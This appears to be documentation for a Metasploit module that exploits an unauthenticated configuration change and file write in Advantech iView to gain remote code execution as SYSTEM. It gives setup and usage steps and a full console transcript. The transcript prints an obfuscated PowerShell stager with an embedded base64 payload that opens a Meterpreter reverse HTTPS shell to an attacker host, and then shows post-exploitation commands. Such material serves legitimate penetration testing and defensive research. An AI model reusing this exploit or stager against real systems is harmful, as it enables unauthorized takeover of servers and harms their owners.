William Vu
6.1 KiB
6.1 KiB
Vulnerable Application
This module exploits an unauthenticated configuration change combined with an unauthenticated file write primitive, leading to an arbitrary file write that allows for remote code execution as the user running iView, which is typically NT AUTHORITY\SYSTEM.
The exploit functions by first modifying a configuration value to be a writable path in the webroot. An export function is then leveraged to write JSP content into the previously configured which can then be requested to trigger the execution of an OS command within the context of the application. Once completed, the original configuration value is restored.
Setup (Windows)
- Follow each of the steps from the iView Installation Instructions guide that is distributed with the application.
- The installer contains the necessary dependencies. This guide will outlines the steps necessary for configuring each of them.
- Once the installation is complete, the "Installation Verification" step (Step 6) will most likely fail. This is
because the "Apache Tomcat 6" service is not running. Attempting to start it will fail. To correct this issue:
- Copy the
msvcr100.dllfile fromC:\Program Files (x86)\Java\jre7\bintoC:\Program Files (x86)\iView\Apache Software Foundation\Tomcat6.0\bin. - Restart the "Apache Tomcat 6" service. 1 At this point, the application should be listening on port 8080 and no additional configuration is necessary.
- Copy the
Verification Steps
- Install the application (see the "Setup" section)
- Start msfconsole
- Do:
use exploit/windows/http/advantech_iview_unauth_rce - Set the
RHOSTandPAYLOADoptions as applicable - Do:
run - You should get a shell.
Scenarios
Windows 10 v1909 x64 running Advantech iView 5.7.0002.5992
msf6 exploit(windows/http/advantech_iview_unauth_rce) > set RHOSTS 192.168.159.30
RHOSTS => 192.168.159.30
msf6 exploit(windows/http/advantech_iview_unauth_rce) > check
[*] 192.168.159.30:8080 - The target appears to be vulnerable.
msf6 exploit(windows/http/advantech_iview_unauth_rce) > exploit
[*] Started HTTPS reverse handler on https://192.168.159.128:8443
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Retrieving config
[+] Successfully retrieved config
[*] Updating config
[+] Successfully updated config
[*] Writing JSP stub
[+] Successfully wrote JSP stub
[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_https
[*] Executing command: cmd.exe /c powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
[+] Successfully executed command
[*] Restoring config
[+] Successfully restored config
[*] https://192.168.159.128:8443 handling request from 192.168.159.30; (UUID: romk3zgq) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 192.168.159.30:62405) at 2021-03-22 15:01:57 -0400
[!] This exploit may require manual cleanup of 'webapps\iView3\SpmIkVwVxCmze0kQ8PhSUVHXRrRNLa.jsp' on the target
meterpreter >
[+] Deleted webapps\iView3\SpmIkVwVxCmze0kQ8PhSUVHXRrRNLa.jsp
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-RTCRBEV
OS : Windows 10 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >